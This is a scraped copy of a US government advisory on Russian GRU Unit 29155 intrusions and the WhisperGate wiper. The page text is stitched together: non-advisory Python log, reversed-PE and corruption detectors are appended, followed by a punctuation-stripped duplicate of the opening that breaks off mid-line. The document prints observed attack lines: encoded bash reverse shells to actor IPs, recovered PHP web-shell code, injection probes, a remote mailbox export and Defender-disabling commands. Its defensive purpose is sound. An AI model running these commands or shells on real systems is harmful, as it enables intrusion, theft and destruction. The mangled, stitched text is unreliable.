Russian Military Cyber Actors Target US and Global Critical Infrastructure | CISA
Summary

The Federal Bureau of Investigation (FBI), Cybersecurity and Infrastructure Security Agency (CISA), and National Security Agency (NSA) assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate (GRU) 161st Specialist Training Center (Unit 29155) are responsible for computer network operations against global targets for the purposes of espionage, sabotage, and reputational harm since at least 2020. GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13, 2022. These cyber actors are separate from other known and more established GRU-affiliated cyber groups, such as Unit 26165 and Unit 74455.

To mitigate this malicious cyber activity, organizations should take the following actions today:

This Cybersecurity Advisory provides tactics, techniques, and procedures (TTPs) associated with Unit 29155 cyber actors, both during and succeeding their deployment of WhisperGate against Ukraine, as well as further analysis (see Appendix A) of the WhisperGate malware initially published in the joint advisory Destructive Malware Targeting Organizations in Ukraine, published February 26, 2022.

FBI, CISA, NSA, and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020:

For additional information on Russian state-sponsored malicious cyber activity and related indictments, see the recent U.S. Department of Justice (DOJ) press releases for June 26, 2024 and September 5, 2024, FBI's Cyber Crime webpage, and CISA's Russia Cyber Threat Overview and Advisories webpage.

Download the PDF version of this report.

For a downloadable copy of indicators of compromise (IOCs):

Note: This advisory uses the MITRE ATT&CK Matrix for Enterprise framework, version 15. See the MITRE ATT&CK Tactics and Techniques section for a table of the threat actors' activity mapped to MITRE ATT&CK tactics and techniques.

Technical Details

FBI, NSA, and CISA assess Unit 29155 is responsible for attempted coups, sabotage and influence operations, and assassination attempts throughout Europe. Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020. Unit 29155 cyber actors' objectives appear to include the collection of information for espionage purposes, reputational harm caused by the theft and leakage of sensitive information, and systematic sabotage caused by the destruction of data [T1485].

FBI assesses the Unit 29155 cyber actors to be junior active-duty GRU officers under the direction of experienced Unit 29155 leadership. These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions. Additionally, FBI assesses Unit 29155 cyber actors rely on non-GRU actors, including known cybercriminals and enablers, to conduct their operations.

The cybersecurity industry provides overlapping cyber threat intelligence, IOCs, and mitigation recommendations related to Unit 29155 cyber actors. While not all encompassing, the following are the most notable threat group names related under MITRE ATT&CK G1003 and commonly used within the cybersecurity community:

Note: Cybersecurity companies have different methods of tracking and attributing cyber actors, and this may not be a 1:1 correlation to the U.S. Government's understanding for all activity related to these groupings.

In addition to WhisperGate and other incidents against Ukraine, Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization (NATO) in Europe and North America, as well as countries in Europe, Latin America, and Central Asia. The activity includes cyber campaigns such as website defacements, infrastructure scanning, data exfiltration, and data leak operations. These actors sell or publicly release exfiltrated victim data obtained from their compromises. Since early 2022, the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to Ukraine.

To date, the FBI has observed more than 14,000 instances of domain scanning across at least 26 NATO members and several additional European Union (EU) countries. Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim information.

Whether through offensive operations or scanning activity, Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors, including the government services, financial services, transportation systems, energy, and healthcare sectors of NATO members, the EU, and Central American and Asian countries.

Unit 29155 cyber actors have been observed targeting IP ranges [T1595.001] used within multiple government and critical infrastructure organizations. The following are publicly available tools these cyber actors have used for scanning [T1595] and vulnerability exploit efforts. Unit 29155 cyber actors were not observed using these tools outside of their intended purpose. Note: Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use and/or control.

Additionally, Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration [T1572] over port 1194 and, in some instances, to perform Active Directory (AD) enumeration. Adminer, in combination with Impacket and ldapdomaindump, were tools used for gathering information on AD. Once active devices are found, Unit 29155 cyber actors look for vulnerabilities to exploit. For example, the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind cross-site scripting, as shown in the following commands:

    GET /index.php?log=to@example.com%0d%0abcc:009247.318-33773.18.31bf6.c194462.bxss.me
    GET /CMS/files/log.htm HTTP/1.1 nslookup hitccruvbrumn76c1b.bxss.me||perl -e "gethostbyname('hitccruvbrumn76c1b.bxss.me')"

As the cyber actors perform reconnaissance on victim networks and discover vulnerabilities within victim web servers or machines, they obtain CVE exploit scripts from GitHub repositories and use them against victim infrastructure [T1588.005]. Unit 29155 cyber actors have been observed obtaining the respective exploit scripts for, but not exploiting, the following CVEs:

Analysis concluded Unit 29155 cyber actors have exploited the following CVEs for initial access [T1190], as detailed throughout this advisory:

Rather than build custom solutions, Unit 29155 cyber actors use common red teaming techniques and publicly available tools to conduct cyber operations. As a result, many TTPs overlap with those of other cyber actors, which can lead to misattribution.

Unit 29155 actors and their cybercriminal affiliates commonly maintain accounts on dark web forums; this has provided the opportunity to obtain various hacker tools such as malware and malware loaders [T1588.001] like Raspberry Robin and SaintBot. While Unit 29155 cyber actors are best known for their use of WhisperGate malware against Ukraine, the use of WhisperGate is not unique to the group. Technical analysis can be found in Appendix A: WhisperGate Malware Analysis.

Unit 29155 cyber actors are known to use VPNs to anonymize their operational activity. These cyber actors commonly attempt to exploit weaknesses in internet-facing systems, like the CVEs listed above, to initially access networks. In one instance, Unit 29155 cyber actors exploited CVE-2021-33044 and CVE-2021-33045 on Dahua IP cameras to bypass identity authentication.

Unit 29155 cyber actors have used Shodan to scan for Internet of Things (IoT) devices, using exploitation scripts to authenticate to IP cameras with default usernames and passwords [T1078.001] and exfiltrating images [T1125] (JPG files). Attempts are then made to perform remote command execution via web to vulnerable IP cameras; if successful, cyber actors would dump configuration settings and credentials in plaintext, as shown in Table 1 below [T1552.001].

Appendix B: Indicators of Compromise lists threat actor IP addresses associated with the activity detailed in this section.

Note: These events are independent and not correlated as a single timeline of compromise.

Table 1. These requests are likely intended to dump configuration settings and credentials [T1003]:

    hxxpIPportPictureCatchcgiusernameNAMEpassword3becho20223c2123include20file22SYSCFG223e223etmpLoginhtm3bdatatype1attachment1channel1secret1keyPWNED
    hxxpIPportssicgitmpLoginhtm
    txtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F17943175382F68702003E261227d
    txtUserloltxtPassword2btConnectPieslC493gtiesbtConnectPieslC493gtieschRememberontxtPasswordg00dPa2424w0rDtxtUser7bprintsystem22bash20i203E26202Fdev2Ftcp2F8117241302F68702003E261227d
    printsystembash i devtcp17943175386870 01
    printsystembash i devtcp8117241306870 01

In addition, incident analysis identified the general observations listed below on victim infrastructure. Each event should be considered independent and may have been used by Unit 29155 cyber actors against multiple victims at different dates and timeframes. Appendix B: Indicators of Compromise lists IOCs associated with the observations in Table 1 and below.

Since at least 2020, Unit 29155 cyber actors have used virtual private servers (VPSs) [T1583.003] to host their operational tools, perform reconnaissance, exploit victim infrastructure, and exfiltrate victim data. Use of VPSs is common because the associated IP addresses do not identify the actors' true country of origin.

When an exploit is successfully executed on a victim system, the actors can then launch a Meterpreter payload [T1105], which commonly uses a reverse Transmission Control Protocol (TCP) connection to initiate communication with the threat actors' infrastructure [T1095]. In one instance, an established reverse TCP session was observed from victim to actor infrastructure via the following ports:

Additional observations were collected from victim engagement and analysis, including:

Once Unit 29155 cyber actors gain access to the victims' internal network, the victims have observed the following process entries (a Java-named binary acting as a SOCKS5 listener and port forwarder, with shell history disabled via HISTFILE=/dev/null):

    8212 SJ 00254 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME= RC_PID=33980 java -L socks5://127.0.0.1:13338
    8282 IJ 00398 HISTFILE=/dev/null PATH=/sbin:/bin:/usr/sbin:/usr/bin LD_LIBRARY_PATH=/usr/local/lib:/usr/local/lib OLDPWD=/tmp PWD=/tmp/.ICE-unix HOME= RC_PID=33980 java -L rtcp://0.0.0.0:13381/127.0.0.1:13338 -F socks5://<IP Address>:7896

PHP code observed on victim web servers (a reverse shell, an eval-based command runner, and a file writer; shown as recovered from the page):

    if isset POST sessionsidwp
    poll id POST sessionsidwp
    sessii explode
    base64decodepollid sockfsockopensessiiO sessiil
    procprocopenbinsh i arrayOsock lsock
    2sock pipes

    function nbresa
    evalsystembase64 decode a

    if issetPOSTfl
    flPOSTfl
    f2POSTf2
    content base64 decodefl
    h fopenf2w
    text content
    fwritehtext
    fclose h

Exfiltration

In several instances, analysis identified Unit 29155 cyber actors compressing victim data [T1560] (e.g., the entire filesystem, select file system artifacts, or user data and/or database dumps) to send back to their infrastructure. These cyber actors commonly use the command-line program Rclone to exfiltrate data to a remote location from victim infrastructure.

Unit 29155 cyber actors have exfiltrated Windows processes and artifacts such as Local Security Authority Subsystem Service (LSASS) memory dumps [T1003.001], Security Accounts Manager (SAM) files [T1003.002], and SECURITY and SYSTEM event log files [T1654]. As seen in victim incident response results, actor infrastructure has also been used to compromise multiple mail servers [T1114] and exfiltrate mail artifacts such as email messages using PowerShell [T1059.001] via the following command:

    powershell New-MailboxExportRequest -Mailbox <resource> -FilePath \\<IP Address>\share\folder1.pst

See Table 3 to Table 14 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK's Best Practices for MITRE ATT&CK Mapping and CISA's Decider Tool.

Unit 29155 cyber actors have used a variety of public exploits, including CVE-2021-33044, CVE-2021-33045, CVE-2022-26134, and CVE-2022-26138.

The proof of concept exploit for CVE-2022-26134 (Through the Wire) has also been used against a victim's internet-facing Confluence server.

Unit 29155 cyber actors executed commands via ProxyChains, a tool used to route internal traffic through a series of proxies.

ProxyChains was also used to provide further anonymity and modify system configuration to force network traffic through chains of SOCKS5 proxies and respective ports.

Mitigations

The authoring agencies recommend organizations implement the mitigations supplied below to improve organizational cybersecurity posture based on threat actor activity. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA's Cross-Sector Cybersecurity Performance Goals for more information on the CPGs, including additional recommended baseline protections.

In addition to applying mitigations, the authoring agencies recommend exercising, testing, and validating your organization's security program against the threat behaviors mapped to the MITRE ATT&CK for Enterprise framework in this advisory. The authoring agencies recommend testing your existing security controls inventory to assess how they perform against the ATT&CK techniques described in this advisory.

To get started:

The authoring agencies recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory.

To report suspicious or criminal activity related to information found in this joint Cybersecurity Advisory, contact your local FBI field office or CISA's 24/7 Operations Center at SayCISA@cisa.dhs.gov or (888) 282-0870. When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. For NSA client requirements or general cybersecurity inquiries, contact CybersecurityRequests@nsa.gov.

The information in this report is being provided "as is" for informational purposes only. CISA and the authoring agencies do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise does not constitute or imply endorsement, recommendation, or favoring by CISA and the authoring agencies.

Version history: September 5, 2024: Initial version.

Appendix A: WhisperGate Malware Analysis

This technical analysis details the WhisperGate malware deployed against Ukraine; samples were collected from one victim and analyzed. The analysis provides insight into Unit 29155 cyber actor infrastructure used for network scanning, password compromising, and data exfiltration against Ukraine, NATO members in Europe and North America, and countries in Latin America and Central Asia.

Unit 29155 cyber actors' use of WhisperGate involved the deployment of the malware files stage1.exe and stage2.exe. WhisperGate has two stages that corrupt a system's master boot record, display a fake ransomware note, and encrypt files based on certain file extensions (see AA22-057A). The actors used multiple Discord accounts to store malware files, including what appear to be development versions or iterations of the binaries. Discord is commonly leveraged by threat actors as an endpoint for malware distribution and control; in this case, it was used to obtain the next step of the infection chain by directly sharing files through its platform. In the case of stage2.exe, the binary communicated with Discord to obtain Tbopbh.jpg, the malicious payload that is loaded in memory and performs the destructive capabilities [18].

The Discord accounts associated with the WhisperGate campaign are categorized into three main clusters, labeled below as Clusters 1, 2, and 3. All clusters used Discord as a staging environment for malware deployment. These groupings are based on analysis of threat actor IP addresses and the nature of the malware that existed within the accounts. The following sections include notable details found within each cluster.

Cluster 1 contained the following files:

Cluster 2 contained:

Cluster 3 contained:

Two Windows Portable Executable (PE) files, stage1.exe and stage2.exe, were obtained from the Ukrainian victim for analysis. One PE file, asd.exe, was obtained from a U.S. victim.

stage1.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. stage1.exe executes when the infected device is powered down, overwriting the master boot record (MBR) and preventing the system from booting normally. Table 15 lists the hashes and properties attributed to stage1.exe.

asd.exe is likely a development version of stage1.exe. While the behavior of asd.exe is similar to stage1.exe, the messages displayed were different.

stage2.exe was obtained from the C:\ path of the Ukrainian victim's Windows machine. Table 17 lists the hashes and properties attributed to stage2.exe.

Table 18 lists the following chronological observations when stage2.exe executes. The payload was fetched from:

    hxxp://cdn.discordapp[.]com/attachments/928503440139771947/930108637681184768/Tbopbh.jpg

The Visual Basic Script (VBS) file contained the following command:

    CreateObject("WScript.Shell").Run "powershell Set-MpPreference -ExclusionPath 'C:\'", 0, False

AdvancedRun was then used to stop the Windows Defender service and remove its program data:

    C:\Users\<user>\AppData\Local\Temp\AdvancedRun.exe /EXEFilename "C:\Windows\System32\sc.exe" /WindowState 0 /CommandLine "stop WinDefend" /StartDirectory "" /RunAs 8 /Run
    C:\Users\<user>\AppData\Local\Temp\AdvancedRun.exe /EXEFilename "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" /WindowState 0 /CommandLine "rmdir 'C:\ProgramData\Microsoft\Windows Defender' -Recurse" /StartDirectory "" /RunAs 8 /Run

Static analysis was further conducted on two files (stage2.exe and Tbopbh.jpg) to uncover additional malware functionality and attributes.

Static analysis was performed on a variant of stage2.exe; its hashes and properties are listed in Table 19 below. Of note, the MD5 and SHA256 hash values were different from those obtained from the Ukrainian victim machine listed above in Table 17. Behavioral analysis was also performed on the below variant, and both files exhibited the same behavior.

This variant of stage2.exe contained multiple layers of execution:

An account in Discord Cluster 1 contained malware with the following hashes, labeled as Tbopbh.jpg:

When viewing payload Tbopbh.jpg using a hex editor, it ended with the value ZM, or hex values 5A 4D; this indicated the payload was a reversed PE. Reversing the bytes of Tbopbh.jpg revealed the hashes of the resulting payload listed in Table 20 below.

The original filename from the resulting payload was a Dynamic Link Library (DLL) file, Frkmlkdkdubkznbkmcf.dll; its attributes are listed in Table 21. Type and member names inside it consisted of Unicode whitespace characters, such as:

    \u2005 \u2005 \u2009 \u2008 \u2001 \u2007 \u2009 \u200b \u200a \u2005

Note: This format annotates action taken by Eazfuscator to obfuscate items, making it difficult for malware analysts to review.

stage2.exe was observed calling method Ylfwdwgmpilzyaph to begin decrypting resource 78c855a088924e92a7f60d661c3d1845. The reflection library was used to execute method Ylfwdwgmpilzyaph, as shown in the following C# code block:

    using System;            // Type
    using System.IO;         // Path.GetFullPath
    using System.Reflection; // Assembly, BindingFlags

    // Load the decrypted DLL from disk and invoke the obfuscated entry method by name.
    string path = "Frkmlkdkdubkznbkmcf.dll";
    string fqpn = Path.GetFullPath(path);
    Assembly assembly = Assembly.LoadFile(fqpn);
    Type type = assembly.GetType("ClassLibrary1.Main");
    type.InvokeMember("Ylfwdwgmpilzyaph", BindingFlags.InvokeMethod, null, null, null);

The following application configuration accompanied the above code block to allow loading from remote sources:

    <?xml version="1.0" encoding="utf-8"?>
    <configuration>
      <runtime>
        <loadFromRemoteSources enabled="true"/>
      </runtime>
    </configuration>

Upon invoking the method Ylfwdwgmpilzyaph, Nmddfrqqrbyjeygggda.vbs wrote to the Windows TEMP directory and has the following attributes, as listed in Table 22 below.

The VBS code listed in Table 22 used a WScript shell that executed as a Windows application, which ran a PowerShell command to exclude the C:\ drive from Windows Defender's security checks. Malware analysts decoded and decrypted one of the resources from Frkmlkdkdubkznbkmcf.dll (78c855a088924e92a7f60d661c3d1845). Further analysis of Frkmlkdkdubkznbkmcf.dll resulted in an additional DLL file with the following hashes:

This decrypted DLL file contained two resources: AdvancedRun and Waqybg.

Table 23 and Table 24 list the file properties for both the AdvancedRun and reversed Waqybg decompressed files.

The reversed and decompressed Waqybg files contained file corruption logic, along with a final command to ping arbitrarily and delete itself:

    cmd.exe /min /C "ping 111.111.111.111 -n 5 -w 10 > Nul & Del /f /q /s"

Waqybg is known as WhisperKill, a malware downloaded by WhisperGate that destroys files with specific extensions [19-21].

The file extensions listed in Table 25 were targeted for file corruption, selected with the equivalent of the wcscmp C function logic (a string compare function). The corruption logic included overwriting 0x100000, or 1 MB, worth of 0xcc values per targeted file.

stage2.exe and its respective payload Tbopbh.jpg served as a template for other malware within Discord Cluster 1. While most of these other malware files have not been observed in open source reporting, malware analysts assess them as payloads that follow the unravelling process listed in Figure 1 below.

Table 26 below provides a list of MD5 hashes for files found within Discord Cluster 1. When reversed, these files become DLL files which were structured similarly to Frkmlkdkdubkznbkmcf.dll.

Note: Analysts identified the files below in Discord Cluster 1; the files are staged on the Cluster in reversed byte order. Analysts reversed the file byte order for each file into their proper portable executable format (e.g., functional format). The hashes in Table 26 represent both byte orders.

Appendix B: Indicators of Compromise

Table 27 lists observed IP addresses that were first observed as early as 2022 and have been historically linked to Unit 29155 infrastructure. These IPs are considered historical infrastructure and should be investigated for associated abnormal or malicious activity.

Threat actors can exploit jump hosts (also known as jump servers or bastion hosts) to gain unauthorized access or perform malicious activities within a protected network. In this context, the domains listed in Table 28 represent the tools used to establish functionality for creating a jump host.
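Added example (not from the advisory): a small Python detector that applies the reconnaissance patterns described in the Technical Details section (Acunetix blind-XSS out-of-band callbacks to bxss.me, nslookup/perl gethostbyname command-injection probes, and IP camera CGI requests carrying shell metacharacters in the credential parameter) to web server access logs. The log lines, client IPs, and callback hostname are constructed for illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Apache combined format); IPs are documentation ranges,
# the bxss.me hostname label is made up. Not real victim data.
SAMPLE_LOG = """\
203.0.113.7 - - [12/Mar/2024:10:01:02 +0000] "GET /index.php?log=to@example.com%0d%0abcc:hitabc.bxss.me HTTP/1.1" 200 512 "-" "Mozilla/5.0"
203.0.113.7 - - [12/Mar/2024:10:01:05 +0000] "GET /CMS/files/log.htm?x=nslookup%20hitabc.bxss.me%7C%7Cperl%20-e%20%22gethostbyname('hitabc.bxss.me')%22 HTTP/1.1" 404 221 "-" "Mozilla/5.0"
198.51.100.9 - - [12/Mar/2024:11:22:33 +0000] "GET /PictureCatch.cgi?username=admin&password=%3becho%20x&channel=1 HTTP/1.1" 200 88 "-" "python-requests/2.31"
192.0.2.5 - - [12/Mar/2024:11:30:00 +0000] "GET /index.php?page=about HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Apache combined log: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# Patterns taken from the request examples in the advisory, evaluated on the URL-decoded path.
OOB_DOMAIN = re.compile(r"bxss\.me", re.I)                       # blind-XSS callback domain
OOB_CMD = re.compile(r"\b(nslookup|gethostbyname|perl\s+-e)\b", re.I)  # OS command probe
CAMERA_CGI = re.compile(r"/(PictureCatch|ssi)\.cgi", re.I)        # IP camera endpoints
CAMERA_INJECT = re.compile(r"password=[^&]*[;|`]", re.I)           # shell metachars in credential


def classify(path):
    """Return the list of detection labels (with the advisory's ATT&CK references) for one request path."""
    decoded = unquote(unquote(path))  # double-decode to catch %25-encoded probes as well
    hits = []
    if OOB_DOMAIN.search(decoded):
        hits.append("blind-xss-oob-callback (T1595)")
    if OOB_CMD.search(decoded):
        hits.append("os-command-injection-probe (T1595)")
    if CAMERA_CGI.search(decoded):
        hits.append("ip-camera-cgi-access (T1078.001)")
        if CAMERA_INJECT.search(decoded):
            hits.append("ip-camera-command-injection (T1552.001)")
    return hits


def scan_log(text):
    """Parse access-log text and return one finding per request that matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in combined format
        hits = classify(m.group("path"))
        if hits:
            findings.append({"ip": m.group("ip"), "ts": m.group("ts"),
                             "path": m.group("path"), "hits": hits})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["ts"], ", ".join(f["hits"]))
```

Findings can be grouped by source IP to spot a single scanner walking many endpoints, which is what the Acunetix and Shodan-driven activity looks like in practice.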
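Added example (not the advisory's own tooling): a Python triage routine for the reversed-PE staging technique described in Appendix A. It applies the "ZM" trailer check, reverses the bytes, validates the recovered MZ/PE headers, and records MD5 and SHA-256 for both byte orders, as Table 26 does. The sample PE is a constructed stand-in, not one of the advisory's samples.

```python
import hashlib
import struct


def is_pe(data):
    """True if data starts with an MZ header whose e_lfanew (offset 0x3C) points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return e_lfanew + 4 <= len(data) and data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_reversed_pe(blob):
    """Appendix A triage rule: a blob ending in 'ZM' (5A 4D) may be a byte-reversed PE.

    Returns (was_reversed, pe_bytes); pe_bytes is None when neither byte order is a valid PE.
    """
    if is_pe(blob):
        return False, blob
    if blob[-2:] == b"ZM":
        candidate = blob[::-1]
        if is_pe(candidate):
            return True, candidate
    return False, None


def digests(data):
    """MD5 and SHA-256 hex digests, the two hash types the advisory's tables list."""
    return {"md5": hashlib.md5(data).hexdigest(), "sha256": hashlib.sha256(data).hexdigest()}


def hashes_both_orders(blob):
    """Hash the staged blob and, if it was reversed, the recovered PE as well, so an IOC
    lookup matches whichever byte order a table or feed recorded."""
    reversed_flag, pe = recover_reversed_pe(blob)
    out = {"staged": digests(blob)}
    if reversed_flag:
        out["recovered"] = digests(pe)
    return out


def build_sample_pe():
    """Constructed minimal stand-in for a PE: MZ header, e_lfanew = 0x80, PE signature at 0x80.
    Not a real executable and not one of the advisory's samples."""
    buf = bytearray(0x100)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x80)
    buf[0x80:0x84] = b"PE\x00\x00"
    return bytes(buf)


if __name__ == "__main__":
    staged = build_sample_pe()[::-1]  # shape of a Discord-staged payload such as Tbopbh.jpg
    print("trailer:", staged[-2:], "reversed PE:", recover_reversed_pe(staged)[0])
    print(hashes_both_orders(staged))
```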
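Added example (not from the advisory): a Python triage scanner for the WhisperKill corruption pattern described in Appendix A, flagging files whose leading 0x100000 bytes are all 0xCC and grouping them by whether their extension was expected to be targeted. The extension list is an assumed placeholder for Table 25, which is not reproduced on this page, and the directory contents are constructed.

```python
import os
import tempfile

OVERWRITE_LEN = 0x100000  # 1 MB of 0xCC written per targeted file, per Appendix A

# Assumed placeholder for the Table 25 extension list (not reproduced on this page);
# replace with the advisory's actual list before use.
ASSUMED_TARGET_EXTS = {".docx", ".pdf", ".xlsx", ".txt"}


def is_whisperkill_corrupted(path):
    """True if the file's leading 1 MB (or the whole file, if smaller) consists only of 0xCC.
    Heuristic for triage: a legitimately all-0xCC file is possible but rare."""
    with open(path, "rb") as fh:
        head = fh.read(OVERWRITE_LEN)
    return len(head) > 0 and head.count(0xCC) == len(head)


def triage_tree(root, target_exts=ASSUMED_TARGET_EXTS):
    """Walk a directory tree and sort files into: corrupted files with an expected extension,
    corrupted files with an unexpected extension (worth a closer look), and intact files."""
    report = {"corrupted": [], "unexpected": [], "intact": 0}
    for dirpath, _, names in os.walk(root):
        for name in sorted(names):
            path = os.path.join(dirpath, name)
            if not is_whisperkill_corrupted(path):
                report["intact"] += 1
                continue
            ext = os.path.splitext(name)[1].lower()
            bucket = "corrupted" if ext in target_exts else "unexpected"
            report[bucket].append(path)
    return report


def make_sample_tree():
    """Constructed fixture: one wiped .docx, one wiped .bin (not on the assumed list),
    and one clean .pdf. Returns the temporary directory path."""
    root = tempfile.mkdtemp(prefix="whisperkill_demo_")
    with open(os.path.join(root, "report.docx"), "wb") as fh:
        fh.write(b"\xcc" * OVERWRITE_LEN + b"tail of the original file")
    with open(os.path.join(root, "blob.bin"), "wb") as fh:
        fh.write(b"\xcc" * 4096)
    with open(os.path.join(root, "clean.pdf"), "wb") as fh:
        fh.write(b"%PDF-1.4\n" + b"A" * 2000)
    return root


if __name__ == "__main__":
    result = triage_tree(make_sample_tree())
    print(f"corrupted={len(result['corrupted'])} unexpected={len(result['unexpected'])} "
          f"intact={result['intact']}")
```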
Official websites use gov
A gov website belongs to an official government organization in the United States
pp
Secure gov websites use HTTPS
A lock LockA locked padlock or https means youve safely connected to the gov website Share sensitive information only on official secure websites
ppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppSearchppppFree Cyber ServicesElection Threat Updatesprotect2024Secure Our WorldShields UpReport A Cyber IssueppThe Federal Bureau of Investigation FBI Cybersecurity and Infrastructure Security Agency CISA and National Security Agency NSA assess that cyber actors affiliated with the Russian General Staff Main Intelligence Directorate GRU 161st Specialist Training Center Unit 29155 are responsible for computer network operations against global targets for the purposes of espionage sabotage and reputational harm since at least 2020 GRU Unit 29155 cyber actors began deploying the destructive WhisperGate malware against multiple Ukrainian victim organizations as early as January 13 2022 These cyber actors are separate from other known and more established GRUaffiliated cyber groups such as Unit 26165 and Unit 74455ppTo mitigate this malicious cyber activity organizations should take the following actions todayppThis Cybersecurity Advisory provides tactics techniques and procedures TTPs associated with Unit 29155 cyber actorsboth during and succeeding their deployment of WhisperGate against Ukraineas well as further analysis see Appendix A of the WhisperGate malware initially published in the joint advisory Destructive Malware Targeting Organizations in Ukraine published February 26 2022ppFBI CISA NSA and the following partners are releasing this joint advisory as a collective assessment of Unit 29155 cyber operations since 2020ppFor additional information on Russian statesponsored malicious cyber activity and related indictments see the recent US Department of Justice DOJ press releases for June 26 2024 and September 5 2024 FBIs Cyber Crime webpage and CISAs Russia Cyber Threat Overview and Advisories webpageppDownload the PDF version of this reportppFor a downloadable copy of indicators of compromise IOCsppNote This advisory uses the MITRE ATTCK Matrix for Enterprise 
framework version 15 See the MITRE ATTCK Tactics and Techniques section for a table of the threat actors activity mapped to MITRE ATTCK tactics and techniquesppFBI NSA and CISA assess Unit 29155 is responsible for attempted coups sabotage and influence operations and assassination attempts throughout Europe Unit 29155 expanded their tradecraft to include offensive cyber operations since at least 2020 Unit 29155 cyber actors objectives appear to include the collection of information for espionage purposes reputational harm caused by the theft and leakage of sensitive information and systematic sabotage caused by the destruction of data T1485ppFBI assesses the Unit 29155 cyber actors to be junior activeduty GRU officers under the direction of experienced Unit 29155 leadership These individuals appear to be gaining cyber experience and enhancing their technical skills through conducting cyber operations and intrusions Additionally FBI assesses Unit 29155 cyber actors rely on nonGRU actors including known cybercriminals and enablers to conduct their operationsppThe cybersecurity industry provides overlapping cyber threat intelligence IOCs and mitigation recommendations related to Unit 29155 cyber actors While not all encompassing the following are the most notable threat group names related under MITRE ATTCK G1003 and commonly used within the cybersecurity communityppNote Cybersecurity companies have different methods of tracking and attributing cyber actors and this may not be a 11 correlation to the US Governments understanding for all activity related to these groupingsppIn addition to WhisperGate and other incidents against Ukraine Unit 29155 cyber actors have conducted computer network operations against numerous members of the North Atlantic Treaty Organization NATO in Europe and North America as well as countries in Europe Latin America and Central Asia The activity includes cyber campaigns such as website defacements infrastructure scanning data exfiltration 
and data leak operations These actors sell or publicly release exfiltrated victim data obtained from their compromises Since early 2022 the primary focus of the cyber actors appears to be targeting and disrupting efforts to provide aid to UkraineppTo date the FBI has observed more than 14000 instances of domain scanning across at least 26 NATO members and several additional European Union EU countries Unit 29155 cyber actors have defaced victim websites and used public website domains to post exfiltrated victim informationppWhether through offensive operations or scanning activity Unit 29155 cyber actors are known to target critical infrastructure and key resource sectors including the government services financial services transportation systems energy and healthcare sectors of NATO members the EU Central American and Asian countriesppUnit 29155 cyber actors have been observed targeting IP ranges T1595001 used within multiple government and critical infrastructure organizations The following are publicly available tools these cyber actors have used for scanning T1595 and vulnerability exploit efforts Unit 29155 cyber actors were not observed using these tools outside of their intended purpose Note Use of these tools should not be attributed as malicious without analytical evidence to support threat actor use andor controlppAdditionally Unit 29155 cyber actors have used infrastructure configured with OpenVPN configuration T1572 over port 1194 and in some instances to perform Active Directory AD enumeration Adminer in combination with Impacket and ldapdomaindump were tools used for gathering information on AD Once active devices are found Unit 29155 cyber actors look for vulnerabilities to exploit For example the Acunetix vulnerability scanning tool has been used for gathering information on potential vulnerabilities such as blind crosssite scripting as shown in the following commandsppGET indexphplogtoexamplecom0d0abcc009247318337731831bf6c194462bxssmeppGET 
